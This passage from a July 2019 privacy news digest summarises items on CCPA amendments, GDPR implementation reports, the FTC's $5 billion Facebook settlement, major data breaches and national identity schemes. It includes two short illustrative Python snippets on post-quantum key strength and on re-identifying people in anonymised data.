aggregate consumer information from the definition of personal information, among other clarifying amendments. B) Those Placed on Suspense File of the Senate Committee on Appropriations: 1) DATA BROKER REGISTRATION – Assembly Bill 1202 requires data brokers to register with the California Attorney General. [Ad Law Access (Kelley Drye)]

US – One-Month Countdown to Pass CCPA Amendments Begins

On August 12, the California legislature returned after its summer recess. The legislature now has approximately a month to continue the markups and send California Consumer Privacy Act [CCPA: see here & infographic here] amendments to the Governor’s desk for signature before the September 13 deadline. Any amendment that passes the Senate will likely need to go back to the Assembly, since many of the bills have been marked up significantly by the Senate. This blog post is a very useful summary of the seven amendments that are moving forward and what they mean for businesses that are working on implementing a CCPA program. The following are links to other CCPA articles from the NRF Data Protection Report:

Sources: [Data Protection Report (Norton Rose Fulbright) | Security Privacy Bytes | CCPA Amendment Progress Report: July Update | CCPA: The (Qualified) Right to Deletion | What Startups Should Know About the California Consumer Privacy Act | California Senate Committee Blesses Majority of CCPA Amendments | A Recap of the Senate Judiciary Committee Hearing on Amending the California Consumer Privacy Act | Crunch Time in California – CCPA Amendments Hotly Debated and (Some) Defeated – Employee Data Is Back, Reasonable Definition of Personal Information Is Gone (For Now), and More!]

+++

 

16-31 July 2019

Biometrics

US – Digital Map Identifies Where US Govt is Using Facial-Recognition Tech

Digital rights advocacy group Fight for the Future has released a digital map detailing how U.S. law enforcement agencies use facial-recognition technology to scan photos without the knowledge or consent of individuals, Vox reports. The map was compiled from data pulled from the Center on Privacy and Technology at Georgetown Law, news reports, news releases and other sources. Examples include states where the Federal Bureau of Investigation uses facial-recognition tech to scan Department of Motor Vehicle databases, airports where Customs and Border Protection screens passengers on international flights, and cities that use the technology to identify and arrest suspects. In other news, the Orlando Weekly reports the city has ended its two-phase pilot program with Amazon’s Rekognition, citing technological glitches and adding that it has “no immediate plans regarding future pilots to explore this type of facial recognition technology.” [vox.com]

US – Proposed US Law Bans Use of Facial-Recognition Tech in Public Housing

U.S. federal lawmakers are expected to introduce a bill that would ban public housing units that receive funding from the Department of Housing and Urban Development from using facial-recognition technology. Reps. Yvette Clarke, D-N.Y., Ayanna Pressley, D-Mass., and Rashida Tlaib, D-Mich., are the co-sponsors of the No Biometric Barriers to Housing Act. Under the proposed legislation, HUD would be required to submit a report outlining the impact facial recognition has on the housing units and their tenants. This is the first federal bill to propose limits on the use of such technology in housing. [CNET]

Big Data | Artificial Intelligence | Machine Learning

UK – ICO Explores Bias and Discrimination in AI

A recent post on the ICO’s AI Auditing Framework blog explores human bias and discrimination in AI systems, together with some of the technical and organisational measures which can be implemented to mitigate the legal risks associated with these issues. With the increasing prevalence of AI systems, particularly those used for making automated decisions about individuals, it is increasingly important for organisations to be aware of the risks associated with bias and discriminatory behaviour in AI systems. The most appropriate technical and organisational measures for mitigating these risks will be situation-dependent, but organisations implementing such systems should, at a minimum, consider undertaking a DPIA, maximise the integrity of data sets used for training, and ensure that the system is tested and monitored for unbalanced behaviour. The blog post also notes that, whilst not a legal requirement, having a diverse workforce may be a powerful tool to manage bias and discrimination in AI systems, and suggests that undertaking an exercise to identify and prevent bias and discrimination in AI systems may also provide an opportunity for organisations to uncover and address any existing discriminatory practices generally. [Data Notes (Herbert Smith Freehills)]

Canada

CA – Canada, US Begin New Phase of Cross-Border Data Sharing

The Canada Border Services Agency and U.S. Customs and Border Protection will begin to share biographic data, travel documents and other data related to border crossings. The announcement marks the launch of the third phase of the “Beyond the Border” security agreement the two countries signed in 2011. The U.S. Department of Homeland Security said in a statement the cross-border sharing will help the two governments determine how long an individual has been in a country and identify those who have overstayed their period of admission. [CBC News]

Encryption

US – Attorney General Backs Encryption Backdoors

U.S. Attorney General William Barr has reopened a dispute between the government and tech industry regarding encrypted messages. Speaking at a cybersecurity conference in New York City, Barr alleged that fully encrypted messaging has allowed “criminals to operate with impunity” as encryption stymies law enforcement’s ability to identify criminals. “Making our virtual world more secure should not come at the expense of making us more vulnerable in the real world,” Barr said. “But unfortunately, this is where we appear to be headed.” Barr added that the tech industry should consider giving law enforcement backdoor access but noted the time to cooperate and act “may be limited.” [The Hill]

US – Researchers Study Ways to Combat Quantum Attacks

Cybersecurity researchers are working to get ahead of quantum computer attacks, which could become a practical threat in the years ahead. Quantum computers could dramatically speed up the computations needed to break much of today’s encryption. The defense being explored is post-quantum cryptography: algorithms that run on current computer technology yet are designed to stay secure once quantum attacks become a reality. The U.S. National Institute of Standards and Technology has narrowed its list of candidate schemes from 69 to 26 over the last three years. [MIT Technology Review]
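
The threat model behind this work rests on two well-known results: Shor’s algorithm breaks RSA and elliptic-curve cryptography outright, while Grover’s algorithm quadratically speeds up brute-force key search, roughly halving the effective strength of symmetric keys. A back-of-the-envelope sketch, illustrative only:

```python
# Effective security levels under the standard quantum threat model.
# Grover's algorithm finds a key among 2^n candidates in roughly
# 2^(n/2) steps, halving the effective bit strength of symmetric
# primitives; Shor's algorithm breaks RSA/ECC outright.
symmetric = {
    "AES-128": 128,
    "AES-256": 256,
    "SHA-256 (preimage)": 256,
}

for name, bits in symmetric.items():
    print(f"{name}: {bits}-bit classical -> ~{bits // 2}-bit quantum")

# Public-key schemes fare far worse: Shor's algorithm factors integers
# and computes discrete logarithms in polynomial time, so RSA-2048 and
# P-256 offer essentially no long-term security against a large,
# fault-tolerant quantum computer.
```

This asymmetry is why the NIST candidates are built on lattice, code-based, hash-based and related problems rather than simply on larger RSA keys.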

EU Developments

EU – Countries Receive New ePrivacy Regulation Proposals

The Finnish presidency of the Council of the European Union has drawn up new ePrivacy Regulation proposals and sent them to fellow EU nations. Finnish official Maija Rönkä tweeted that the proposals focus on updates to Articles 5-7, adding that the changes include “dividing (Article 6) into four articles to simplify the text and a temporary solution regarding the child imagery issue.” The proposals come after Germany published a 77-page position paper saying it could not accept the regulation as it stands due to a lack of protections for the confidentiality of communications, which are covered in Article 6. The proposals will be discussed at the EU Council’s Telecom Working Party Sept. 9. [Politico Pro.eu]

EU – European Commission Issues Report on the Implementation of the GDPR

On July 24, 2019, the European Commission published a report [see 20 pg PDF here] appraising Europe’s progress in implementing the General Data Protection Regulation [GDPR – here] as a central component of its revamped data protection framework. In its report, the Commission highlights certain achievements resulting from implementation efforts, calls attention to issues that require further action, and describes several ongoing and planned initiatives. The report is a follow-up to a prior report [see 18 pg PDF here] issued in January 2018, and was informed to a great extent by the ongoing work of the Multi-stakeholder Group, which brings together civil society and business representatives, academics and practitioners to support the application of the GDPR. The report will contribute to the Commission’s formal two-year review of the GDPR, which will take place in May 2020. [This blog post discusses the issues under the following headers]: 1) Member States; 2) Supervisory Authorities; 3) Individual rights and businesses’ compliance efforts; 4) International cooperation; and 5) Data protection legislation across EU legal policy. The Commission concludes its report by stating that the first year of the application of the GDPR has been overall positive, but that there is still work to be done in a number of areas. This is an understatement. [Inside Privacy (Covington)]

EU – Study Reveals 1 In 3 EU Businesses Not in Compliance with GDPR

A report from accounting company RSM shows one-third of EU businesses are still working toward complying with the EU General Data Protection Regulation. The report, which is based on responses from 300 companies, shows 57% of respondents have confidence that they are in compliance with the law. Medium-sized businesses are lagging most with compliance while “struggling to understand and implement,” according to the report. “With so much pressure on organisations to meet complex requirements, we saw GDPR fatigue setting in last year,” RSM U.K. Technology Risk Assurance Partner Steven Snaith said. [ITProPortal]

UK – Research Shows Data Breach Reports Tripled Since GDPR Took Effect

According to research from law firm RPC, data breach reports in the U.K. have risen by 175% in the last year. There have been 379 breach reports since the EU General Data Protection Regulation took force last May, while there were just 138 the year prior. “GDPR has driven a cultural shift in how people perceive personal data and its value,” RPC Partner Richard Breavington said. “More people now see it as part of their personal property, and they are more likely to act if they believe it is being misused.” [Yahoo Finance UK]

EU – EDPB Releases 2018 Annual Report

On July 16, 2019, the European Data Protection Board [EDPB: see here] published its Annual Report for 2018 [see 34 pg PDF here]. The Report highlights that the EDPB: 1) endorsed 16 guidelines previously adopted by the Article 29 Working Party; 2) adopted four additional guidelines to clarify provisions of the General Data Protection Regulation [GDPR]; 3) adopted 26 consistency opinions to guarantee the consistent application of the GDPR by the EU data protection authorities; and 4) issued two opinions in the context of the legislative consultation process, as well as a statement on its own initiative and on the draft ePrivacy Regulation. The Report also discloses some of the topics that the EDPB aims to further consider in its two-year work program for 2019-2020, such as data subjects’ rights, the concept of controller and processor, and legitimate interest. The EDPB also plans to focus on new technologies, such as connected vehicles, blockchain, artificial intelligence and digital assistants, video surveillance, search engine delisting, and data protection by design and by default. [EDPB | Privacy & Information Security Law Blog (Hunton Andrews Kurth)]

EU – EDPB Seeks Comments on Its Guidelines on Video Data Processing

The European Data Protection Board is asking for comments on its recently adopted guidelines for processing personal data using video devices. The guidelines clarify many questions involving video surveillance, including that organizations using surveillance must explicitly notify subjects that they are doing so and provide a detailed purpose for the technology’s use. The guidelines also spell out the lawful bases for surveillance, the most common being legitimate interest and necessity “in the public interest.” Surveillance based on subjects’ consent, the guidelines say, will be permissible only in exceptional cases. The EDPB’s period for comment on the guidelines closes Sept. 9. [EDPB]

UK – ICO Opens Public Consultation on Data Sharing Code of Practice Draft

The U.K. Information Commissioner’s Office has released the latest draft of its new data sharing code of practice for public consultation. The first code of practice was published in 2011; however, the ICO is required to update the document under the Data Protection Act 2018. The revamped code will “explain and advise on changes to data protection legislation where these changes are relevant to data sharing.” It will also address aspects of the act, such as the sections on transparency and the lawful bases for data processing. The public consultation will be open until 9 Sept. Feedback can be submitted via the ICO’s online survey or email. [ICO.org.uk]

EU – CNIL Announces Guidelines for Cookies, Trackers

France’s data protection authority, the CNIL, has published guidelines on the use of cookies and other types of trackers. The guidelines will replace the authority’s 2013 recommendations to operators on the obligation to obtain consent for the use of cookies. The CNIL said the update was necessary because the prior recommendation “was not compatible with the new provisions of the [EU General Data Protection Regulation].” The new guidelines, which are part of the authority’s recent action plan for online marketing, will be supplemented by a final recommendation that will go into effect in 2020. [CNIL.fr]

Facts & Stats

US – 2019 Cost of a Data Breach Report

The 2019 Cost of a Data Breach Report is now out [see PR here & access here & here]. This is the 14th such report conducted by the Ponemon Institute [here] for IBM. This year’s report studied the costs associated with breaches that occurred between July 2018 and April 2019 at 507 organizations in 16 countries and regions and across 17 industry sectors. The global average cost of a data breach for the 2019 study is $3.92 million, a 1.5% increase from the 2018 study [here], and up from $3.5 million in 2014, a growth of 12 percent between 2014 and 2019. [The remainder of this long blog post: 1) reviews the study highlights; 2) examines top cost-mitigating factors such as incident response teams, plans and encryption; and 3) looks at the long-tail costs of a data breach.] There are many more illuminating ways to look at the cost of a data breach, and the 2019 Cost of a Data Breach Report offers much more than can be covered in a single blog post. For example, the report goes into great detail about the regional and industry differences in total cost, customer turnover, data breach size and data breach life cycle. It also looks in greater depth at the impacts of an effective incident response strategy and examines the cost impacts of security automation using technologies such as AI, machine learning, analytics and automated post-breach orchestration. [Security Intelligence (IBM)]

Finance

CA – Federal Court Dismisses FATCA Charter Challenge

In a ruling dated July 22, Federal Court of Canada Justice Anne Mactavish dismissed an appeal from two American citizens, Gwendolyn Deegan and Kazia Highton, who now live in Canada and have no real ongoing connection with the United States [read the ruling and the original 24 pg PDF complaint]. The U.S. Foreign Account Tax Compliance Act, or FATCA, requires financial institutions in countries outside the United States to report information about accounts held by U.S. individuals, including Canadians with dual citizenship. Deegan and Highton challenged the constitutionality of Canadian provisions implementing an agreement between the countries that makes the information-sharing possible. They argued the provisions breached charter guarantees that prevent unreasonable seizure and ensure equality of people under law. Mactavish concluded that although the provisions do result in the seizure of the banking information of Americans in Canada, the affected people have only a limited expectation of privacy in their banking information. [Advisor’s Edge | Court dismisses challenge of deal that helps U.S. nab tax cheats in Canada | French Court Declines to Overturn Tax Treaty With U.S.]

WW – Report: Cyberinsurance Premiums Reached $2B in 2018

A study from Moody’s Investors Service found cyberinsurance premiums grew to $2 billion in 2018 and have seen a cumulative annual growth rate of 26% since 2015. Moody’s found global insurance companies have benefited financially from the increased demand for cyberinsurance. “The proliferation of new rules around the globe boosts demand for cyber insurance, but also raises questions and highlights uncertainty around the scope of insurance coverage,” Moody’s Associate Managing Director Sarah Hibler said. The report noted claims tend to be large because cyberattacks can affect vast numbers of victims, and the situation may worsen as more companies move to cloud computing. [South China Morning Post]

FOI

CA – Alberta’s Sunshine List Legislation Under Review

The 2018 sunshine list disclosed the pay and benefits of the province’s top earners paid by the public purse. The threshold to be included on the sunshine list was $108,784 for government employees and included approximately 2,600 public servants. For employees of boards, agencies and commissions, compensation had to add up to $129,809 or more to be disclosed. United Conservative house leader Jason Nixon tabled a motion on July 2 to examine the Public Sector Compensation Transparency Act [see here], which first came into force Dec. 11, 2015. MLAs on the resource stewardship committee [see here] agreed to go back to 170 public sector bodies, government departments and other stakeholders contacted last year to invite submissions. The new review will give interested parties and members of the public until Sept. 9 to offer their thoughts. In 2018, top earners on the sunshine list included Alberta Electric System Operator president and CEO David Erickson ($926,976 in pay and benefits), Workers’ Compensation Board president and CEO Guy Kerr ($907,484 in salary and benefits) and University of Alberta president and vice-chancellor David Turpin ($766,203 in pay and benefits). The top compensated government employee was Marcia Nelson, deputy minister of executive council, who took home $487,137 in salary and benefits. [Edmonton Journal | Review of sunshine list legislation resumes after Alberta election | Alberta’s sunshine list still keeping one key profession in the shadows: doctors]

Genetics

US – DNA Testing Creates Predicaments for Family Historians

The popularity of DNA testing has created an unexpected dilemma for family historians. There are millions of family trees online, and some DNA-testing sites allow members to reach out to each other through a built-in messaging app. While there are benefits to this, today’s family historian now has to “juggle the privacy of their relatives, some of whom don’t want to be involved, alongside the curiosity of strangers who arrive with evidence that they are part of the family and may want to establish a relationship.” [The Wall Street Journal]

US – Ancestry CEO: Customers Should Use Caution When Sharing Genetic Data

Ancestry CEO Margo Georgiadis is urging consumers to be careful when choosing to take an at-home DNA test to learn more about their genetic history. Consumers may not realize their data could be shared with law enforcement, drug companies and, in some cases, app developers. Georgiadis, who spoke at Fortune’s Brainstorm Tech conference earlier this week, said Ancestry “does not cooperate with law enforcement unless compelled by a court order.” In June, Ancestry, 23andMe and Helix formed the Coalition for Genetic Data Protection to protect customers’ information. [Fortune]

Health / Medical

US – Healthcare Leads in Data Breaches Reported, Survey Finds

While nearly all U.S. healthcare organizations, including providers, are collecting, storing or sharing sensitive information within technologies like cloud platforms, fewer than 40% encrypt data in such environments, according to a new report by French security company Thales and analyst firm IDC [read 3 pg PDF PR here & access report here]. Seven in 10 organizations reported they had experienced a data breach at some point, and a third said there had been a breach in the past year; Thales said those numbers are the highest among the industries it has studied. While the country’s healthcare organizations may recognize the threat, with 40% acknowledging they are “very” or “extremely” vulnerable, they appear overconfident in their ability to thwart security lapses: 73% of respondents felt their security for new technology deployments is “very” or “extremely” secure. The findings jibe with other recent reports. An Integris Software survey from last month [see 40 pg PDF here & coverage here] found 70% of mid- to large-size healthcare companies in the U.S. were confident in their ability to manage sensitive data, but half updated their inventory of such data once a year or less. [Healthcare Dive]

Horror Stories

US – FTC Fines Facebook Historic $5B for Privacy Violations

TechCrunch: On July 24 the FTC officially announced the terms of its settlement with Facebook: $5 billion (as previously rumored) and improved privacy oversight within the company. The order-mandated privacy program covers Facebook-owned WhatsApp and Instagram, as well as Facebook’s eponymous social platform. [read long FTC PR here, watch 55 min FTC presser here, read FTC 50 pg PDF Complaint document here and FTC 31 pg PDF terms of settlement document here – also read FTC blog post on today’s events here] The FTC first confirmed that it was investigating Facebook in March of last year, during the then-new hubbub surrounding Cambridge Analytica’s abuse of data siphoned from the network. The regulator was specifically concerned that Facebook had been systematically violating the terms of its 2012 agreement [read 2012 FTC PR & related docs here], which barred the company from a number of practices concerning user data. The order was approved in a 3-2 vote by the agency’s commissioners. The two Democratic commissioners who voted against the settlement were Rohit Chopra [read his 21 pg PDF statement of reasons here] and Rebecca Kelly Slaughter [read her 15 pg PDF statement of reasons here]. The FTC notes that the penalty against Facebook [$5 billion] is the largest ever imposed on any company for violating consumers’ privacy — as well as flagging that it’s “almost 20 times greater than the largest privacy or data security penalty ever imposed worldwide”. In addition to the money, Facebook will have to create a board committee on privacy, and must provide executive assurance that user data is being respected. The FTC says the structure of its 20-year order against Facebook removes the “unfettered control” over privacy decisions exercised by CEO Mark Zuckerberg — by creating greater accountability at the board of directors level via the establishment of what it calls an “independent privacy committee.” Facebook will also be required to designate compliance officers who will be responsible for Facebook’s privacy program. [As per the FTC PR here] “Facebook CEO Mark Zuckerberg and designated compliance officers must independently submit to the FTC quarterly certifications that the company is in compliance with the privacy program mandated by the order, as well as an annual certification that the company is in overall compliance with the order. Any false certification will subject them to individual civil and criminal penalties.” Another strand is aimed at strengthening external oversight of Facebook, with the FTC claiming enhancements to audit processes, which must take place every two years, to evaluate the effectiveness of Facebook’s privacy program and identify any gaps. Facebook must also conduct a privacy review of every new or modified product, service, or practice before it is implemented, and document its decisions about user privacy, per the order. The order also imposes security breach disclosure requirements on Facebook, which is required to document incidents when data of 500 or more users has been compromised, along with details of how it has sought to fix the problem — and provide that documentation to the FTC and the assessor within 30 days of discovering the breach.
The FTC notes a laundry list of what it couches as “significant new privacy requirements” that it’s also imposing on the company — writing that: 1) Facebook must exercise greater oversight over third-party apps, including by terminating app developers that fail to certify that they are in compliance with Facebook’s platform policies or fail to justify their need for specific user data; 2) Facebook is prohibited from using telephone numbers obtained to enable a security feature (e.g., two-factor authentication) for advertising; 3) Facebook must provide clear and conspicuous notice of its use of facial recognition technology, and obtain affirmative express user consent prior to any use that materially exceeds its prior disclosures to users; 4) Facebook must establish, implement, and maintain a comprehensive data security program; 5) Facebook must encrypt user passwords and regularly scan to detect whether any passwords are stored in plaintext; and 6) Facebook is prohibited from asking for email passwords to other services when consumers sign up for its services. There are already criticisms of the order for not being strong enough — including from current FTC commissioners Rohit Chopra [21 pg PDF] and Rebecca Kelly Slaughter [15 pg PDF]. Likewise, the FTC’s former CTO, Ashkan Soltani [here], told TechCrunch [the settlement] was a “terrible outcome” for his former employer. “Facebook’s dominated the press schedule the entire time,” he told us. “They’ve controlled when this release is, same day as the Mueller [testimony], same day as their earnings call. The $5BN number — while significant for the agency — is essentially a ‘get out of jail’ card for Facebook,” he added, noting that the order indemnifies the company for any behavior prior to June 12 — “which is I think unheard of”. “It’s kind of crazy in terms of how good of a deal this was for the company.” That such a favorable result could be signed off by even three of five commissioners is “a sign of who the FTC is”, he also said. “I don’t think it really addresses the direction that Facebook is moving towards and it really highlights the lack of authority that the agency has.” Facebook has responded to the penalty announcement in a lengthy blog post penned by general counsel Colin Stretch. In another response, Mark Zuckerberg has posted a comment about the settlement on his Facebook page — where he says “we’re going to make some major structural changes to how we build products and run this company” [read here – also watch this short clip of him discussing the FTC settlement at a company-wide event July 24 here]. [IAPP]

US – FTC Fines Facebook $5B, Imposes New Privacy Rules

Canadian Facebook users could benefit from new privacy rules imposed by U.S. authorities as part of an historic $5-billion U.S. Federal Trade Commission settlement with the social media giant [FTC PR here, watch 55 min FTC presser here, read FTC 50 pg PDF Complaint document here and FTC 31 pg PDF terms of settlement document here – also read FTC blog post on today’s events here]. FTC officials told reporters that the new privacy rules imposed on Facebook could have a far greater impact on the company’s operations than the enormous fine. Moreover, the new privacy rules could apply to Facebook’s roughly 23 million users in Canada, where the company has been accused of skirting privacy rules and refusing to comply with federal law. In April, Privacy Commissioner Daniel Therrien said that the social media giant broke Canadian privacy law in the Cambridge Analytica scandal, when 87 million Facebook users had their personal information harvested by researcher Aleksandr Kogan [read PR here]. Despite 622,000 Canadians having had their personal information collected — the vast majority without their knowledge or consent — Facebook said in April it was “disappointed” in Therrien’s report [see here] into the Cambridge Analytica scandal, and that there was no evidence that the data was shared with Cambridge Analytica. Therrien’s office said it still intends to bring its complaint to Federal Court, and that it is reviewing the FTC’s decision “with interest.” [The Star | Next in the Facebook-Cambridge Analytica scandal: Canadian privacy commissioners’ report on AggregateIQ | Facebook settles with FTC: $5 billion and new privacy guarantees | Today was Facebook’s worst day ever, and it won’t make a difference | The FTC Wants More Privacy, Less Zuckerberg, at Facebook | 9 reasons the Facebook FTC settlement is a joke | Here’s Why Facebook’s FTC Settlement Is a Joke | There’s Zero Chance Facebook’s FTC Fine Stops Future Abuse, Lawmakers and Privacy Experts Say | Facebook ends friend data access for Microsoft and Sony, the last 2 of its legacy partners, under FTC deal | Statement by FPF CEO Jules Polonetsky: Facebook Case Shows It Is Time to Give the FTC Enhanced Civil Penalty Authority | The FTC-Facebook Settlement Does Too Little to Protect Your Privacy | Public Knowledge Responds to Facebook Announcement of FTC Investigation | FTC Issues Facebook Fine, EPIC – “Too little, too late.”]

WW – Capital One Breach

Credit card company Capital One has acknowledged that a data breach has compromised personal information of 100 million US customers and 6 million Canadian customers. The affected data include information collected from customers at the time they applied for credit cards between 2006 and 2019 as well as credit scores, credit limits and balances, and contact information. The FBI has arrested a suspect in the case. capitalone.com: Capital One Announces Data Security Incident | zdnet: 100 million Americans and 6 million Canadians caught up in Capital One breach | arstechnica: Hacker ID’d as former Amazon employee steals data of 106 million people from Capital One | Everything Canadians need to know about the Capital One data breach | Capital One data breach: Morneau calls for investigation into hack affecting Canadians]

US – Equifax Agrees to Pay $1.4B In Class-Action Suit Over 2017 Breach

On the same day it was hit with a $700 million fine by the U.S. Federal Trade Commission, Equifax has agreed to a proposed settlement worth at least $1.4 billion in a multidistrict class-action suit over its 2017 data breach. According to court papers filed at a U.S. District Court in Georgia, the settlement features a $1 billion commitment by the credit-reporting company to improve cybersecurity measures over the next five years. Equifax will also establish a $380.5 million fund over a four-year span that will go toward credit monitoring and financial help for any of the 147 million victims who are still feeling the effects of the breach. [law.com]

RU – Russian Intelligence Agency FSB Suffers Largest Data Breach in Its History

FSB, Russia’s largest and most powerful intelligence agency [see wiki] recently suffered the largest data breach in its history when a hacker group stole 7.5 terabytes of data from one of its largest contractors [to grasp the enormity of 7.5 terabytes of data think of 750,000 Webster’s Collegiate Dictionaries side-by-side – see here]. The massive data heist was carried out by a hacker group known as Digital Revolution that now claims to possess vast amounts of data concerning several of the FSB’s covert activities that include data scraping from social media platforms, unearthing identities of individuals who engage in secret communications on Tor, and creating a closed Internet for Russia. These documents were stolen by the hacker group 0v1ru$ (possibly a subsidiary of Digital Revolution) from the servers of SyTech, one of the FSB’s largest contractors. According to reports, SyTech works mostly with FSB’s 16th Directorate which is responsible for signals intelligence. While many of the stolen documents have been posted to Twitter by Digital Revolution via a series of tweets, the hacker conglomerate has also shared a large number of documents obtained from SyTech with several journalists. None of the covert activities of FSB that were unearthed by 0v1ru$ will surprise Russia watchers as the Putin administration has been known for increasing surveillance on domestic Internet users, creating an isolated version of the Internet that will work only in Russia, as well as carrying out a number of operations that involve the use of social media platforms. [TEISS | Russia’s Secret Intelligence Agency Hacked: ‘Largest Data Breach In Its History’ | Hackers steal 7.5 terabytes of data from Russian security agency ]

WW – Data Breach Affects 100M Online Invitation Users

More than 100 million Evite users had their data exposed when hackers gained access to the company’s servers. Earlier this year, the online invitation site revealed attackers breached its servers and were able to access user information, including personal information, email addresses and, in some cases, phone numbers and mailing addresses. The breach was thought to have affected 10 million users; however, data breach monitoring service Have I Been Pwned received a database containing records on nearly 101 million affected users. “Upon investigation, they found unauthorised access to a database archive dating back to 2013,” Have I Been Pwned said in a statement. [Bleeping Computer]

Identity Issues

IN – India Stirs Privacy Concerns with Proposed Aadhaar, Health Records Merge

A proposal to combine India’s Aadhaar identification system and the country’s health system into one database is drawing backlash from privacy advocates. The proposed merger was announced by India’s Health Ministry in its National Digital Health Blueprint report, which is now open for public consultation. The ministry is aiming to boost India’s health system while streamlining access to both personal and health records. The privacy concerns stem from prior issues with Aadhaar safeguards and the concept of expanding government access to personal and sensitive information. “This function creep is very worrying,” Indian Institute of Management Associate Professor Reetika Khera said. “It’s trying to engulf every aspect of a human’s life in India.” [FT.com]

WW – UN Official: Privacy Rights Under Threat With Irish Govt’s National ID Card

UN special rapporteur on extreme poverty Prof Philip Alston has called out the Irish government’s roll-out of the Public Services Card [PSC], which contains biometric information, saying the government introduced the card “without any transparency or public debate”, at a conference in Dublin organised by the Irish Council for Civil Liberties (ICCL) [watch, read ICCL post & 11 pg PDF report]. As of 2018, the government had issued the card to roughly 2.5 million people. The card was initially for people getting social welfare payments, but that role has now been expanded to include a number of other areas where it’s apparently required, which prompted Alston to ask “what are the intentions of the government?” in creating the card. He argued that governments generally “find it very difficult to resist the temptation to use” data gathered about their citizens while emphasising that: “we have no information as to what state agencies will be able to gain access to the biometric information stored on the card.” He believes that assorted government agencies might be able to access “sensitive” information about a person in the future. And he asserted that the card: “does have at least the potential to really, very significantly, transform your relations with government and certainly your ability to maintain any shred of privacy.” For its part, the ICCL maintains the “government is centralising biometric information in a database”. Given this, there’s a risk that the data will be “vulnerable to misuse, attacks, and leaks”. And it went on to declare that the PSC is “probably illegal under EU law”. [The Canary] See also: [Here’s everything you need to know about Public Services Cards | Public Services Card an example of ‘how technology can be used against people living in poverty’]

US – Equifax Will Examine Alternatives for Confirming Identities of US Consumers

A provision in Equifax’s recent settlement with the U.S. Federal Trade Commission, Consumer Financial Protection Bureau, and 50 states and territories calls on the credit-reporting firm to explore alternatives to identifying U.S. residents beyond Social Security numbers. Equifax will fund a study on possible alternatives and file a report on its conclusions to California Attorney General Xavier Becerra. “I’m hopeful that this will lead to changes in the industry that will better secure people’s information,” Pennsylvania Attorney General Josh Shapiro said. Mayer Brown Cybersecurity and Data Privacy Attorney Marcus Christian said the provision is a rarity but added that the U.S. is “in desperate need of a way other than Social Security numbers to identify people.” [The Wall Street Journal]

US – Health Care Industry Pressing Lawmakers for National Patient Identifier

Health care industry leaders held a congressional briefing to implore the U.S. Senate to fund the creation of a patient identifier. The House of Representatives voted in June to approve the funding for identifiers, which was banned and removed from the Health Insurance Portability and Accountability Act in 1998. “Exchanging medical records between provider organizations becomes problematic without a reliable way of identifying the patient,” Forrester Analyst Jeff Becker said at the briefing. The American Health Information Management Association and College of Healthcare Information Management Executives added in a joint statement that lifting the ban would help to identify ways to limit medical errors and protect patient privacy. [TechTarget]

WW – Study Shows Anonymized Data Lacks Complete Privacy

Privacy researchers have published a study showing that “anonymized” data can often be traced back to the individuals it describes. The research and a supporting demonstration tool show that individuals can be re-identified using a machine-learning model trained to estimate how likely a given combination of attributes is to be unique. Using 15 characteristics, including basic identifiers such as age, gender and marital status, the researchers estimate that 99.98% of Americans could be correctly re-identified in any dataset. “While there might be a lot of people who are in their thirties, male, and living in New York City, far fewer of them were also born [Jan. 5], are driving a red sports car, and live with two kids (both girls) and one dog,” UCLouvain’s Luc Rocher said. [Tech Xplore]
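
The intuition behind that result is easy to reproduce: each added quasi-identifier partitions the population into smaller groups, and once a combination of attributes maps to a group of one, the record is re-identifiable. The study itself fits a generative (copula-based) model to estimate uniqueness; the toy sketch below simply counts unique attribute combinations in synthetic data, with cardinalities invented for illustration:

```python
import random
from collections import Counter

random.seed(42)
N = 100_000  # synthetic population size

# Invented cardinalities for eight quasi-identifiers (think age, sex,
# birth month, day of month, ZIP-code bucket, and so on).
cardinalities = [73, 2, 12, 31, 100, 50, 10, 5]

people = [tuple(random.randrange(c) for c in cardinalities)
          for _ in range(N)]

# Fraction of records uniquely identified by their first k attributes.
for k in range(1, len(cardinalities) + 1):
    counts = Counter(p[:k] for p in people)
    unique = sum(1 for p in people if counts[p[:k]] == 1)
    print(f"{k} attributes: {unique / N:6.1%} of records unique")
```

On this toy population, uniqueness climbs from essentially zero with three attributes to roughly one in six records with four and nearly everyone with five, which mirrors the study’s point that 15 real-world characteristics leave almost no one hidden.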

CA – Identifiers Need Revamp for Digital Age, Desjardins CEO Tells MPs

The current system for identifying Canadians is inadequate for the digital age, the chief executive of Desjardins Group [Guy Cormier – see here] told MPs in an emergency meeting of the Commons Public Safety and National Security Committee [SECU: see here & meeting notice here] grappling with the fallout of a major data breach at his financial-services company. The breach, revealed in June, saw the leak of names, addresses, birthdates, social-insurance numbers and other private information from roughly 2.7 million people and 173,000 businesses [read company PRs here & here and news coverage here]. Earlier in the day, Cormier announced Desjardins would extend protections to all of its clients by protecting and compensating them for fraudulent transactions, giving them access to services to deal with identity theft, and paying related fees if identity theft occurs [read PR here]. He noted that 13 per cent of the co-operative’s members — more than 360,000 people — had signed up for credit monitoring through Equifax, and that Desjardins had offered its own protections to cover the clients who had not signed up through Equifax. He said he was “ambivalent” about the committee meeting because he thought it was “premature” to discuss the situation while the investigation is still on. But he said his company is committed to being transparent and working with authorities on the issue. “We must all learn from what Desjardins has undergone,” Cormier said in French. He said that although he could not recommend a particular new regime for identifying people in the digital age, “the status quo is not an option” when it comes to preventing identity theft and protecting private data. He recommended the government convene a special working group made up of representatives from the government, the financial sector, telecommunications, legal experts and others to determine a new framework for data and privacy in Canada. However, John McKay, the Liberal chair of the committee, said the committee has not set any further meetings on the subject and would likely not take it up again this summer. He said he hopes the next version of his committee, formed after the election, would examine what he called a perfect case study of cybersecurity gone wrong. McKay said he felt as though Desjardins had not been adequately held to account over the procedures (or lack of them) in place to stop employees from breaching data protection rules. “I would have preferred to see questioning be far more pointed,” he said in an interview after the meeting. In contrast, Alberta Conservative MP Glen Motz [see here] said, “We’re here to listen to them, to understand their perspective, and to develop a way forward that is going to be advantageous to all Canadians.” Though it bore some responsibility, Desjardins “is also a victim in this,” he said. Denis Berthiaume [read bio here], the chief operating officer at Desjardins, said the cybersecurity risk posed by employees was one of the most difficult to manage. But he said the company did have strong security policies and this was a case of an employee violating all those rules and procedures. On May 8, Conservative Leader Andrew Scheer had called for members to look into whether re-issuing social insurance numbers for those affected might help protect them from identity theft and fraud [news coverage here].
But during testimony, a senior official from Service Canada said new social insurance numbers would not necessarily stop the fraud, and could result in further errors during the re-issuing process. In addition to the committee’s meeting and the police investigation, privacy commissioners in Ottawa and Quebec will be working in tandem to investigate the issue and determine whether Desjardins had adequate data-protection policies in place [read joint notice here]. [Financial Post]

Internet / WWW

WW – Online Publishers Affected by Ad Changes
